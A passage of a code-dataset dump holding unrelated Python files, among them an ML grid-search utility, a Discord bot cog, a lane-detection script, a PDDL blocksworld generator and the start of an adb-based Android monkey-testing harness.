y_train)\n\n print('==Sampling Result==')\n print('y_train : ', list(map(lambda x: x.tolist(), np.unique(y_train, return_counts=True))))\n print('y_train_over :', list(map(lambda x: x.tolist(), np.unique(y_train_over, return_counts=True))))\n\n return X_train_over, y_train_over\n\n\n# Done\ndef clf_evaluation(y_test, \n y_pred,\n acc_s=True,\n pre_s=True,\n rec_s=True,\n f1_s=True,\n auc_s=True,\n conf_m=True,\n view_scores=True):\n \"\"\"\n Get all evaluation scores from 'y_test', 'y_pred'.\n\n Parameters\n ----------\n y_test : \n Truth labels\n \n y_pred : \n Predicted labels\n \n acc_s, pre_s, rec_s, f1_s, auc_s, conf_m : (bool), default=True\n On-off each scores\n \n \"\"\"\n if acc_s :\n acc = accuracy_score(y_test, y_pred)\n else:\n acc = None\n if pre_s :\n pre = precision_score(y_test, y_pred)\n else:\n pre = None\n if rec_s :\n rec = recall_score(y_test, y_pred)\n else:\n rec = None\n if f1_s :\n f1 = f1_score(y_test, y_pred)\n else:\n f1 = None\n if auc_s :\n auc = roc_auc_score(y_test, y_pred)\n else:\n auc = None\n if conf_m :\n confusion = confusion_matrix(y_test, y_pred)\n print('=> confusion matrix')\n print(confusion)\n print('======================')\n \n if view_scores :\n col_names = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n result = [[acc, pre, rec, f1, auc]]\n df_values = pd.DataFrame(result, columns=col_names)\n print(df_values)\n print('====Done Evaluation====')\n \n return acc, pre, rec, f1, auc\n\n\n# fit_cv\ndef fit_cv(X_train, y_train, X_test, y_test, scaler='RB', scoring='recall', conf_m=False, view_scores=False, draw_cv=True, n_jobs=-1, **kwargs):\n \"\"\"\n GridSearchCV. 
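Runs a stratified 5-fold grid search over each classifier pipeline\n    (LogisticReg, DecisionTree, RandomForest, LightGBM, SVC) with the chosen\n    scaler, evaluates each best estimator on the train and test sets, and\n    draws a confusion-matrix heatmap per classifier.\n\n    Usecase (a sketch; assumes data from split_train_test)\n    -------\n    cv_list, result_df = fit_cv(X_train, y_train, X_test, y_test, scoring='recall')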
\n \n \n \n Parameters\n ----------\n\n scoring : (string), default='recall'\n 'recall', 'precision', 'f1'\n \n scaler : (string), default='RB'\n 'No': None, 'SD' : StandardScaler(), 'MM' : MinmaxScaler(), 'RB' : RobustScaler()\n \n conf_m : (bool), default=True\n on-off confusion matrix\n \n view_scores : (bool), default=True\n on-off each scores\n \n Return\n ----------\n \n cv_list : list of best estimators resulted from cross-validations.\n result_df : dataframe of cross-validation results.\n \n \n \"\"\"\n cv_list = []\n cv_estimators = []\n st_time = time.time()\n \n scaler_selected = [one[1] for one in scalers if one[0] == scaler][0]\n \n # Pipelines\n lr_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[0][1])], verbose=True)\n dt_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[1][1])], verbose=True)\n rf_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[2][1])], verbose=True)\n lgbm_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[3][1])], verbose=True)\n svm_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[4][1])], verbose=True)\n \n skfold = StratifiedKFold(n_splits=5, random_state=13, shuffle=True)\n \n lr_CV = GridSearchCV(lr_pipe, lr_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n dt_CV = GridSearchCV(dt_pipe, dt_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n rf_CV = GridSearchCV(rf_pipe, rf_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n lgbm_CV = GridSearchCV(lgbm_pipe, lgbm_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n svc_CV = GridSearchCV(svm_pipe, svc_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n\n CVs = [lr_CV, dt_CV, rf_CV, lgbm_CV, svc_CV]\n\n result_df = pd.DataFrame(columns=['classifier', 'train accuracy', 'train precision', 'train recall', 'train f1','train auc','test accuracy','test precision','test recall','test f1','test auc'])\n\n for idx, cv in enumerate(CVs):\n cv.fit(X_train, y_train)\n \n cv_list.append(cv.best_estimator_)\n cv_estimators.append([cv.best_estimator_[0], cv.best_estimator_[1]])\n\n y_pred_train = cv.predict(X_train)\n y_pred_test = cv.predict(X_test)\n\n acc_tr, pre_tr, rec_tr, f1_tr, auc_tr = clf_evaluation(y_train, y_pred_train, conf_m=conf_m, view_scores=view_scores, **kwargs)\n acc_te, pre_te, rec_te, f1_te, auc_te = clf_evaluation(y_test, y_pred_test, conf_m=conf_m, view_scores=view_scores, **kwargs)\n\n result = {'classifier' : clfs[idx][0],\n 'train accuracy' : acc_tr,\n 'train precision' : pre_tr,\n 'train recall' : rec_tr,\n 'train f1': f1_tr,\n 'train auc' : auc_tr,\n 'test accuracy' : acc_te,\n 'test precision' : pre_te,\n 'test recall' : rec_te,\n 'test f1' : f1_te,\n 'test auc' : auc_te }\n\n result_df = result_df.append(result, ignore_index=True)\n \n \n # 히트맵\n conf_mtx = confusion_matrix(y_test, y_pred_test)\n plt.figure(figsize=(6,4))\n plt.title(f\"< {clfs[idx][0]} >\")\n sns.heatmap(conf_mtx, annot=True, yticklabels=[\"No_act\", \"Yes_act\"], xticklabels=[\"No_pred\", \"Yes_pred\"], fmt='d')\n plt.show()\n \n print('Fit time :', round((time.time() - st_time) / 60, 2), 'min')\n \n if draw_cv:\n draw_roc_curve(cv_list, cv_estimators, X_test, y_test)\n \n result_df\n return cv_list, result_df\n \n\n# roc_curve 그래프 만들기\ndef draw_roc_curve(models, model_names, X_test, y_test):\n plt.figure(figsize=(10,10))\n \n for idx in range(len(models)-1):\n pred = models[idx].predict_proba(X_test)[:, 1]\n fpr, tpr, thresholds = roc_curve(y_test, pred)\n plt.plot(fpr, tpr, label=model_names[idx])\n \n plt.plot([0,1], [0,1], 'k--', 
label='random guess')\n plt.title('ROC')\n plt.legend()\n plt.grid()\n plt.show()","sub_path":"workspace/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"259243431","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015 - hackfox \n# Created on 2015/07/06\n\"\"\"\n# How many distinct three-digit numbers can the digits 1, 2, 3, 4 form, and what are they?\n\"\"\"\n\n# How many distinct three-digit numbers can the digits 1, 2, 3, 4 form, and what are they?\n# range(): the left argument is the minimum, the right bound is exclusive\n# Python has no switch/case statement\n# Python has no && or || operators; use and / or instead\n# Python has no ++ / -- operators; use += 1 / -= 1 instead\n# Python for loops take no parentheses\n# Python functions are defined with def; every function returns a value, so it need not be declared\ncn = 0\nfor i in range(1, 5):\n    for j in range(1, 5):\n        for k in range(1, 5):\n            if i != j and j != k and i != k:\n                print(i * 100 + j * 10 + k)\n                cn += 1\n\nprint('count->' + str(cn))\n","sub_path":"Python/201507/some.py","file_name":"some.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191603330","text":"#!/usr/bin/env python\nimport configparser\n\nfrom setuptools import find_packages, setup\n\nSRC_PREFIX = 'src'\n\npackages = find_packages(SRC_PREFIX)\n\n\ndef get_required_packages():\n    \"\"\"\n    Returns the packages used for install_requires\n\n    This used to pin down every package in Pipfile.lock to the version, but that, in turn, broke\n    downstream projects because it was way too strict.\n\n    Now, this simply grabs all the items listed in the `Pipfile` `[packages]` section without version\n    pinning\n    \"\"\"\n    config = configparser.ConfigParser(strict=False)\n    config.read('Pipfile')\n\n    install_requires = sorted([x for x in config['packages']])\n\n    return install_requires\n\n\ndef readme():\n    with open('README.md') as f:\n        return f.read()\n\n\nif __name__ == '__main__':\n    setup(\n        name='vault-tools',\n        url='https://github.com/openslate/vault-tools',\n        author='OpenSlate',\n        author_email='code@openslate.com',\n        version='0.1.1',\n        description='misc tools to work with vault',\n        long_description=readme(),\n        long_description_content_type='text/markdown',\n        package_dir={'': 'src'},\n        packages=packages,\n        entry_points={\n            'console_scripts': [\n                'process-vault-environment = vault_tools.entrypoints:process_vault_environment',\n                'renew-token = vault_tools.entrypoints:renew_token',\n            ],\n        },\n        scripts=[\n            'scripts/write-vault-environment',\n        ],\n        install_requires=get_required_packages()\n    )\n","sub_path":"pypi_install_script/vault-tools-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"650348352","text":"from django.urls import path\nfrom . 
import views\n\n\napp_name = 'customer'\n\nurlpatterns = [\n    path('signup/', views.SignUp.as_view(), name='signup'),\n\t#/customer/reservation/ \n\tpath('/reservation/', views.CarReservation.as_view(), name='CarReservation'),\n\t#/customer/342/invoicepayment/\n\tpath('<int:pk>/invoicepayment/', views.RentalInvoiceDetailView.as_view(), name='invoicepayment'),\n\t\n]\n","sub_path":"MadhuKarz/customer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"294863388","text":"import os\nimport csv\nimport discord\nfrom discord.ext import commands\nfrom discord.errors import HTTPException\nfrom modules.misc_utils import get_dict_keys, project_path\nfrom modules.chat_utils import get_embed, first_upper, bold, strikethrough\nfrom modules.data_getter import fetch, get_tables, get_character_info, get_user_character, get_columns, get_prefix\n\nparameters = {\n    \"char\": [\"character\"],\n    \"list\": [\"table\"]\n}\nspecial_columns = ('taken_by', 'thumbnail', 'img', 'discord_role', 'table')\n\n\nclass Output:\n    def __init__(self, client):\n        self.client = client\n\n    @commands.command(pass_context=True)\n    async def char(self, ctx, *args):\n        character = ' '.join(args)\n        server = ctx.message.server.id\n\n        info = await get_character_info(server, character)\n        attributes = get_dict_keys(info)\n\n        if len(args) == 0:\n            prefix = await get_prefix(server)\n            await self.client.say(f\"Usage: `{prefix}char (character)`\\n\"\n                                  f\"Use `{prefix}list` to see who's available\")\n\n        if \"table\" not in attributes:\n            return\n\n        output = ''\n        for a in attributes:\n            if a not in special_columns and info[a] != \"N/A\":\n                row = bold(f\"{first_upper(a).replace('_', ' ')}: \") + first_upper(info[a])\n                output += row + '\\n'\n\n        e = get_embed(f\"{first_upper(info['table'])} - {info['name']}\", output, discord.Colour(0x546e7a))\n        e.add_field(name='Taken By:', value=info['taken_by'])\n        if 'thumbnail' in attributes:\n            e.set_thumbnail(url=info['thumbnail'])\n        if 'img' in attributes:\n            e.set_image(url=info['img'])\n        if 'discord_role' in attributes:\n            role = discord.utils.get(ctx.message.server.roles, name=info['discord_role'])\n            if role is not None:\n                e.colour = role.colour\n\n        prefix = await get_prefix(server)\n        try:\n            await self.client.say(f\"Like this character? Use `{prefix}take {info['name']}` to become them!\", embed=e)\n        except HTTPException:\n            e.set_thumbnail(url='')\n            e.set_image(url='')\n            await self.client.say(f\"Like this character? 
Use `{prefix}take {info['name']}` to become them!\", embed=e)\n\n @commands.command(pass_context=True, aliases=[\"list\"])\n async def catalogue(self, ctx, *args):\n msgs = {\n \"usage\": \"Usage: `{}list (table)`\",\n \"invalid_param\": \"Error: Table `{}` doesn't exist\",\n \"tables\": \"Available tables: `{}`\",\n \"success\": \"Use `{}take (name)` to become one of these characters!\\n\"\n \"Use `{}char (name)` to see a character's info!\"\n }\n\n pl = parameters[\"list\"]\n server = ctx.message.server.id\n tables = await get_tables(server)\n prefix = await get_prefix(server)\n\n if pl.index(\"table\") >= len(args):\n await self.client.say(msgs['usage'].format(prefix) + '\\n' +\n msgs[\"tables\"].format(\"` `\".join(tables)))\n return\n\n t = args[pl.index(\"table\")].lower()\n if t not in tables:\n await self.client.say(msgs['invalid_param'].format(args[pl.index(\"table\")]) + '\\n' +\n msgs[\"tables\"].format(\"` `\".join(tables)))\n return\n\n characters = await fetch(server, t, \"name\")\n characters = [c[\"name\"] for c in characters]\n\n output = ''\n for c in characters:\n formatted_c = bold(c)\n taken_by = (await fetch(server, t, \"taken_by\", f\"name='{c}'\"))[0][\"taken_by\"]\n if taken_by != \"nobody\":\n formatted_c = strikethrough(formatted_c)\n output += f\"{formatted_c}\\n\"\n\n await self.client.say(msgs[\"success\"].format(prefix, prefix),\n embed=get_embed(first_upper(t), output, discord.Colour(0x546e7a)))\n\n @commands.command(pass_context=True, aliases=[\"export\"])\n async def download(self, ctx, example=None):\n if not ctx.message.author.server_permissions.administrator:\n await self.client.say(\"You don't have the permissions to do that!\")\n return\n\n if example == \"example\":\n fout = os.path.join(project_path, \"files\", \"example.csv\")\n await self.client.send_file(ctx.message.channel, fout)\n return\n\n server = ctx.message.server.id\n tables = await get_tables(server)\n columns = await get_columns(server)\n\n path = os.path.join(project_path, \"files\", f\"{server}.csv\")\n with open(path, \"w+\") as fout:\n writer = csv.writer(fout)\n\n for t in tables:\n row = [t]\n row += [' ' for i in range(len(columns)-1)]\n writer.writerow(row)\n writer.writerow(columns)\n\n data = await fetch(server, t, \"all\")\n for d in data:\n row = []\n for c in columns:\n row.append(d[c])\n\n writer.writerow(row)\n\n await self.client.send_file(ctx.message.channel, path, filename=\"Server Data.csv\")\n\n os.remove(path)\n\n\ndef setup(client):\n client.add_cog(Output(client))","sub_path":"commands/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":5285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"142213847","text":"import korflib\nimport sys\n\n#Make sure command line has 2 arguments\nassert(len(sys.argv) == 2)\n\n#Make the length of each sequence line 60 bases long\ndef wrap(seq, step=60):\n\tfor i in range(0, len(seq), step):\n\t\tprint(seq[i:i+step])\n\t\t\n#Read in fasta file and change specific sequences into Ns\nfor id, seq in korflib.read_fasta(sys.argv[1]):\n\tif id.startswith(\"X\"):\n\t\tbeg = 74036400\n\t\tend = 74085786\t\t#exon beg is 74085691 \n\t\tmut = 74085586\t\t#the T at this site was changed to A\n\t\tmx = seq[:beg] + \"N\"*(end-beg) + seq[end:]\n\t\tprint(f\">{id}\")\n\t\twrap(mx)\n\t\tprint(\">Mecp2_e1 dna:chromosome chromosome:GRCm38:Mecp2_e1:1:49386:1 REF\")\n\t\twrap(seq[beg:end])\n\t\tprint(\">Mecp2_e2 dna:chromosome chromosome:GRCm38:Mecp2_e2:1:49386:1 
REF\")\n\t\twrap(seq[beg:mut-1] + \"a\" + seq[mut:end])\n\telse:\n\t\tprint(f\">{id}\")\n\t\twrap(seq)\n\t","sub_path":"custom_refgenome.py","file_name":"custom_refgenome.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"78346351","text":"\"\"\"\nSample\n(define (problem BW-rand-50)\n(:domain blocksworld)\n(:objects b1 b2 b3 - block)\n(:init\n(handempty)\n(ontable b1)\n(on b3 b2)\n(ontable b2)\n(clear b1)\n(clear b3)\n)\n(:goal\n(and\n(on b1 b2)\n(on b2 b3)\n)\n)\n)\n\"\"\"\nimport random\nimport copy\n#================================================\ndef generate_problem(num_blocks, dest_file_name, num_blocks_in_goal = None):\n \"\"\"\n\n :param num_blocks:\n :param num_blocks_in_goal:\n :return:\n \"\"\"\n if num_blocks_in_goal == None:\n num_blocks_in_goal = num_blocks\n block_obj_list = [\"b\"+str(x) for x in range(num_blocks)]\n goal_blocks_list = random.sample(block_obj_list,num_blocks_in_goal)\n clear_blocks = copy.deepcopy(block_obj_list)\n with open(dest_file_name,\"w\") as dest_file:\n dest_file.write(\"(define (problem BW-rand-\" + str(num_blocks)+\")\\n\")\n dest_file.write(\"(:domain blocksworld)\\n\")\n dest_file.write(\"(:objects \" + \" \".join(block_obj_list) + \" - block)\\n\")\n dest_file.write(\"(:init \\n\")\n dest_file.write(\"\")\n dest_file.write(\"(handempty)\\n\")\n for block in block_obj_list:\n #either choose a clear block to stack on, or be on table\n available_choices = clear_blocks + [\"ontable\"]\n pos = random.choice(available_choices)\n if pos == 'ontable':\n dest_file.write(\"(ontable \"+block+\")\\n\")\n else:#it will be placed on a block\n dest_file.write(\"(on \"+block +' '+pos+\")\\n\")\n clear_blocks.remove(pos)\n #end for loop\n dest_file.write(\")\\n\")\n #now write the goals\n dest_file.write(\"(:goal\\n\")\n dest_file.write(\"(and\\n\")\n clear_blocks = copy.deepcopy(goal_blocks_list)\n for block in goal_blocks_list:\n #either choose a clear block to stack on, or be on table\n available_choices = clear_blocks+ [\"ontable\"]\n pos = random.choice(available_choices)\n if pos == 'ontable':\n dest_file.write(\"(ontable \"+block+\")\\n\")\n else:#it will be placed on a block\n dest_file.write(\"(on \"+block +' '+pos+\")\\n\")\n clear_blocks.remove(pos)\n #end for loop through goal blocks\n dest_file.write(\")\\n)\\n)\")\n #end with statement\n\nif __name__ == \"__main__\":\n random.seed(4)\n generate_problem(5,\"test_blocks_prob.pddl\",3)","sub_path":"Blocksworld_problem_gen.py","file_name":"Blocksworld_problem_gen.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497864159","text":"\n\n#calss header\nclass _GIRLFRIEND():\n\tdef __init__(self,): \n\t\tself.name = \"GIRLFRIEND\"\n\t\tself.definitions = [u'a woman or girl who a person is having a romantic or sexual relationship with: ', u'the female friend of a woman: ', u'used, usually by a woman, when talking to a woman: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_girlfriend.py","file_name":"_girlfriend.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"444716071","text":"import math\nimport cv2\nfrom utils import 
*\n\nclass LaneDetector(object):\n\n def __init__(self):\n pass\n\n # canny transform\n def canny(self, img, low_threshold, high_threshold):\n return cv2.Canny(img, low_threshold, high_threshold) \n\n def gaussian_blur(self, img, kernel_size):\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\n # Find region of interest for the lanes based on defined polygon\n def region_of_interest(self, img, vertices):\n # defining a blank mask to start with\n mask = np.zeros_like(img) \n \n # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n \n # filling pixels inside the polygon defined by \"vertices\" with the fill color \n cv2.fillPoly(mask, vertices, ignore_mask_color)\n \n # returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n \n def draw_lines(self, img, lines, color=[255, 0, 0], thickness=5):\n ll_slope_sum, ll_cnt, rl_slope_sum, rl_cnt = 0, 0, 0, 0\n ll_max, rl_max = (img.shape[1], img.shape[0]), (img.shape[1], img.shape[0])\n\n # Limit left lane lines with slopes between 20 and 70 degrees and right lane\n # slopes between 100 and 160 degrees.\n for line in lines:\n for x1, y1, x2, y2 in line:\n slope = Utils.get_slope(x1, y1, x2, y2)\n if 100 < math.degrees(slope) < 160:\n rl_cnt += 1\n rl_slope_sum += slope\n rl_max = (x1, y1) if y1 < rl_max[1] else rl_max\n elif 20 < math.degrees(slope) < 70:\n ll_cnt += 1\n ll_slope_sum += slope\n ll_max = (x2, y2) if y2 < ll_max[1] else ll_max\n\n # Draw left and right lanes based on top most value and average slope\n top_bound = int(img.shape[0] * .62)\n if ll_cnt > 0:\n (llx2, lly2) = ll_max\n (llx1, lly1) = (int(llx2 - (img.shape[0]-lly2)/math.tan(float(ll_slope_sum)/ll_cnt)), img.shape[0])\n assert (0 < Utils.get_slope(llx1, lly1, llx2, lly2) < math.pi/2)\n if lly2 > top_bound:\n llx2, lly2 = int(llx2 + (lly2-top_bound)/math.tan(float(ll_slope_sum)/ll_cnt)), top_bound\n elif lly2 < top_bound:\n llx2, lly2 = int(llx2 - (top_bound-lly2)/math.tan(float(ll_slope_sum)/ll_cnt)), top_bound\n cv2.line(img, (llx1, lly1), (llx2, lly2), color, thickness)\n if rl_cnt > 0:\n (rlx1, rly1) = rl_max\n (rlx2, rly2) = (int(rlx1 + (rly1-img.shape[0])/math.tan(float(rl_slope_sum)/rl_cnt)), img.shape[0])\n assert (math.pi/2 < Utils.get_slope(rlx1, rly1, rlx2, rly2) < math.pi)\n if rly1 > top_bound:\n rlx1, rly1 = int(rlx1 - (rly1-top_bound)/abs(math.tan(float(rl_slope_sum)/rl_cnt))), top_bound\n elif rly1 < top_bound:\n rlx1, rly1 = int(rlx1 + (top_bound-rly1)/abs(math.tan(float(rl_slope_sum)/rl_cnt))), top_bound\n cv2.line(img, (rlx1, rly1), (rlx2, rly2), color, thickness)\n\n # Input is a canny transformed image. 
Generates the hough lines\n def hough_lines(self, img, rho, theta, threshold, min_line_len, max_line_gap):\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n if lines is not None:\n self.draw_lines(line_img, lines)\n return line_img\n\n # final image is a weighted combination of the original image and image with hough lines \n def weighted_img(self, img, initial_img, α=0.8, β=1., λ=0.):\n return cv2.addWeighted(initial_img, α, img, β, λ)\n\n def mark_lane(self, image):\n imshape = image.shape\n gray_img = Utils.gray_scale(image)\n gaussian_blur_img = self.gaussian_blur(gray_img, 5)\n edges = self.canny(gaussian_blur_img, 60, 200)\n vertices = np.array([[(50, imshape[0]), (imshape[1]*.4, imshape[0]*.6), (imshape[1]*.6, imshape[0]*.6), (imshape[1], imshape[0])]],dtype=np.int32)\n roi = self.region_of_interest(edges, vertices)\n hough_out = self.hough_lines(roi, 1, np.pi / 180, 50, 180, 149)\n lane_marked = self.weighted_img(hough_out, image)\n return lane_marked\n\ndef run_test_images():\n ld = LaneDetector() \n\n img = Utils.load_image('../data/solidWhiteRight.jpg')\n cv2.imwrite('../output/solidWhiteRight.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/solidYellowCurve.jpg')\n cv2.imwrite('../output/solidYellowCurve.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/solidYellowCurve2.jpg')\n cv2.imwrite('../output/solidYellowCurve2.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/solidYellowLeft.jpg')\n cv2.imwrite('../output/solidYellowLeft.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/whiteCarLaneSwitch.jpg')\n cv2.imwrite('../output/whiteCarLaneSwitch.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/line-segments-example.jpg')\n cv2.imwrite('../output/line-segments-example.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/laneLines_thirdPass.jpg')\n cv2.imwrite('../output/laneLines_thirdPass.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n\ndef run_test_video():\n ld = LaneDetector()\n import os\n from moviepy.editor import VideoFileClip\n clip = VideoFileClip(\"../data/solidYellowLeft.mp4\")\n output_clip = clip.fl_image(ld.mark_lane)\n output_clip.write_videofile(\"../output/solidYellowLeft_out.mp4\", audio=False)\n \nif '__main__' == __name__:\n #run_test_images() \n run_test_video()\n","sub_path":"finding_lanelines/src/lane_detection.py","file_name":"lane_detection.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"629400013","text":"import time\n\nimport schedule\n\nfrom config import create_api, add_logging, LOGGER\n\n\n@add_logging(before='Waiting until next run...')\ndef tweet_pi_time(api):\n \"\"\"Tweet the pi time.\"\"\"\n try:\n api.update_status('It’s pi time!')\n except Exception:\n LOGGER.error('Error on updating status', exc_info=True)\n\n\nif __name__ == '__main__':\n api = create_api()\n schedule.every().wednesday.at('03:14').do(tweet_pi_time, api=api)\n while True:\n schedule.run_pending()\n 
time.sleep(1)\n","sub_path":"bots/tweet_pi_time.py","file_name":"tweet_pi_time.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199746905","text":"#coding: utf-8\n\nimport subprocess, sys, os\nimport threading, time, datetime\nimport logging, argparse\nimport shutil\nfrom inter.apkcookpy.lib.apk import APKCook\nimport xml.etree.ElementTree as ET\n\nlogging.basicConfig(level = logging.INFO, format='%(asctime)s - %(levelname)s [%(filename)s:%(lineno)d]: %(message)s')\n\n\ndef execShellDaemon(cmd):\n '''\n async\n '''\n return subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n\ndef execShell(cmd, t=120):\n '''\n sync\n haskey('d') == success, only cmd success, should check output\n '''\n ret = {}\n try:\n p = subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True, timeout=t)\n \n if p.returncode == 0:\n try:\n ret['d'] = p.stdout.decode('utf-8')\n except:\n ret['d'] = p.stdout.decode('gbk')\n else:\n try:\n ret['e'] = p.stderr.decode('utf-8')\n except:\n ret['e'] = p.stderr.decode('gbk')\n \n except subprocess.TimeoutExpired:\n ret['e'] = 'timeout'\n except Exception as e:\n logging.error('subprocess '+str(e))\n\n return ret\n\ndef getPkgList(pkg):\n if os.path.isfile(pkg):\n try:\n with open(pkg, 'r') as f:\n pkgs = f.read().split('\\n')\n except Exception as e:\n #logging.info(str(e))\n return []\n elif pkg:\n pkgs = pkg.split(',')\n out = []\n for p in pkgs:\n if p:\n out.append(p.strip())\n return out\n\ndef getChildNode(node):\n out = []\n if node.get('clickable') == 'true' or node.get('long-clickable') == 'true' or node.get('scrollable') == 'true' or (node.get('class') and node.get('class').startswith('android.widget.EditText')):\n out.append(node.attrib)\n \n if list(node):\n for child in node:\n out += getChildNode(child)\n\n return out\n \ndef parseUIDump(dumpfile):\n tree = ET.parse(dumpfile)\n root = tree.getroot()\n \n return getChildNode(root)\n\n\nclass AMonkey(object):\n def __init__(self, did):\n self._adb = 'adb'\n self._frida = 'frida -U '\n self._did = did\n self._devicepkg = []\n self._curdir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '')\n self._dirapps = os.path.join(self._curdir, 'apps', '')\n self._dirappstmp = os.path.join(self._dirapps, 'tmp', '')\n self._dirinter = os.path.join(self._curdir, 'inter', '')\n self._androidver = ''\n self._blacklist = [\n 'com.android.settings',\n 'com.topjohnwu.magisk',\n 'com.speedsoftware.rootexplorer',\n 'org.proxydroid',\n 'android'\n ]\n\n self._init()\n \n def _init(self):\n if not self.checkOnline(self._did):\n sys.exit()\n if self._did:\n self._adb = 'adb -s '+self._did+' '\n self._devicepkg = self.getDevicePkgs()\n try:\n os.mkdir(self._dirapps)\n except:\n pass\n try:\n os.mkdir(self._dirappstmp)\n except:\n pass\n\n cmd = self._adb + ' shell \"mkdir /sdcard/monkeylogs\"'\n ret = execShell(cmd)\n cmd = self._adb + ' shell \"mkdir /sdcard/monkeyxmls\"'\n ret = execShell(cmd)\n\n def checkOnline(self, deviceid=''):\n devices = execShell('adb devices -l').get('d').split('\\n')\n ret = [d for d in devices if d.find('device ') != -1]\n dids = [d.split()[0] for d in ret]\n if deviceid:\n if deviceid in dids:\n return True\n else:\n logging.error('Device id error')\n logging.error(execShell('adb devices -l').get('d'))\n return False\n else:\n if len(dids) == 0:\n logging.error('No device')\n return False\n elif len(dids) == 1:\n return True\n elif len(dids) > 
1:\n logging.error('More than one device, please set -s deviceid')\n return False\n\n def timeoutKIll(self, pkg, t):\n for i in range(t):\n time.sleep(1)\n cmd = self._adb + ' shell \"am force-stop '+pkg+' \" '\n execShell(cmd)\n\n def getDevicePkgs(self):\n ret = execShell(self._adb + ' shell pm list packages')\n pkgs = []\n if 'e' not in ret.keys():\n dt = ret.get('d').split('\\n')\n for p in dt:\n p = p.strip()\n if p:\n pkgs.append(p.split(':')[1])\n else:\n logging.error(ret.get('e'))\n return pkgs\n \n def pullXml(self, p):\n logging.info('==pull xml')\n\n if not self.setupBusybox():\n logging.error('busybox error')\n return\n\n sp = self._dirapps+p\n cmd = self._adb + ' shell \"pm path '+p+'\"'\n ret = execShell(cmd)\n if 'd' in ret.keys() and ret.get('d'):\n # multiple returns?\n apkpath = ret.get('d').split('\\n')[0].split(':')[1]\n cmd = self._adb + ' shell \"/data/local/tmp/busybox unzip -p '+apkpath+' AndroidManifest.xml > /sdcard/monkeyxmls/'+p+'\"'\n ret = execShell(cmd)\n\n cmd = self._adb + ' shell ls /sdcard/monkeyxmls/'+p\n ret = execShell(cmd)\n if 'No such file' in str(ret) :\n logging.error('xml unzip error')\n return\n \n cmd = self._adb + ' pull /sdcard/monkeyxmls/'+p+' '+sp\n ret = execShell(cmd)\n if 'd' in ret.keys():\n shutil.move(sp, sp+'.xml')\n return sp+'.xml'\n else:\n logging.error('pull error'+ret.get('e')+apkpath)\n else:\n logging.error('device has no '+p)\n \n def setupBusybox(self):\n cmd = self._adb + ' shell ls /data/local/tmp/busybox'\n ret = execShell(cmd)\n \n if 'No such file' in str(ret) :\n busybox = self._dirinter+'busybox'\n if not os.path.isfile(busybox):\n logging.error('please put busybox in dir \"inter\")')\n return False\n cmd = self._adb + ' push '+busybox+' 